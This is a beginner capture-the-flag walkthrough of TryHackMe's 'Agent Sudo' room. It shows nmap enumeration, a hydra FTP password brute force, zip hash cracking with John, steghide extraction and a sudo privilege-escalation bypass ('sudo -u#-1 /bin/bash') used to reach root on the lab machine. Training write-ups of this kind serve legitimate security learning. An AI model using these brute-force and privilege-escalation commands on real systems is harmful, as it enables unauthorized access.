In this walk through, we will be going through the Agent Sudo room from Tryhackme. The room covers basic enumeration, getting initial access with some bruteforce and then elevating privileges by abusing the sudo binary. Overall, it is a fun beginner level room which will covers varies basic topics and will test your methodology. So, without any delay, let’s get started.
|Objective||You found a secret server located under the deep sea. Your task is to hack inside the server and reveal the truth.|
Task 1 – Author note
Task 2 – Enumerate
Enumerate the machine and get all the important information.
- Checking if machine is live or not.
Question 1 – How many open ports?
- Scanning the machine using nmap.
sudo nmap -sS -sV 10.10.203.67
Question 2 – How you redirect yourself to a secret page?
- Accessing the website on port 80.
Question 3 – What is the agent name?
- Use user agent switcher extension and put the user agent value to “C”, then refresh the page.
Task 3 – Hash cracking and brute-force
Done enumerate the machine? Time to brute your way out.
Question 1 – FTP password
- Firing hydra at FTP
hydra -l chris -P ~/Desktop/Wordlist/rockyou.txt ftp://10.10.203.67
Question 2 – Zip file password
- Logging into the FTP server with credentials we got earlier and downloading the files.
- Reading contents of To_agentJ.txt
- Tried exiftool and steghide on both of the images. Got nothing useful.
- Using binwalk to reveal hidden files. Binwalk is a fast and easy-to-use tool for analyzing, reverse engineering, and extracting firmware images.
binwalk cutie.png binwalk -e cutie.png
- Converting zip file into john zip file hash type and cracking the hash.
zip2john 8702.zip > hash.txt
Question 3 – steg password
- Extracting the zip file with the password cracked above.
- Decoded the base 64 string in cyberchef. We got the password.
Question 4 – Who is the other agent (in full name)?
- Extracting the image steg content with the decoded password.
steghide extract -sf cute-alien.jpg
Question 5 – SSH password
Task 4 – Capture the user flag
You know the drill.
Question 1 – What is the user flag?
- Getting a shell using SSH and getting the user flag
Question 2 – What is the incident of the photo called?
- Search on Google – Alien autospy incident foxnews
Roswell alien autops
Task 5 – Privilege escalation
Enough with the extraordinary stuff? Time to get real.
- Getting the linpeas script from the local system and executing on our target machine.
Question 1 – CVE number for the escalation
- Searching for Sudo version 1.8.21, i found the vulnerability.
Question 2 – What is the root flag?
sudo -u#-1 /bin/bash
Question 3 – (Bonus) Who is Agent R?
Also Read: Tryhackme – c4ptur3-th3-fl4g
So that was it. We started the room with a basic enumeration using nmap. Next, Used user-agent switcher to get the potential username to proceed further. Moving on, Bruteforced user “chris” FTP password and downloaded the 3 files – 2 pictures and one txt file. On the downloaded files, used binwalk to extract the zip file. Next, Convert and crack zip password with John. Further, Used the zip file to get a base 64 string. Decoding that string got the steg password of the challenge. Using that password, decoded the message stored in the pictures. In the output file, got the other user name and SSH password. For initial access, SSH into the server using the user’s creds. Got the first flag. For escalating the privileges, used linpeas to get the potential priv escalation vector. Finally, Got a vulnerable sudo version. Leveraging that we got the root.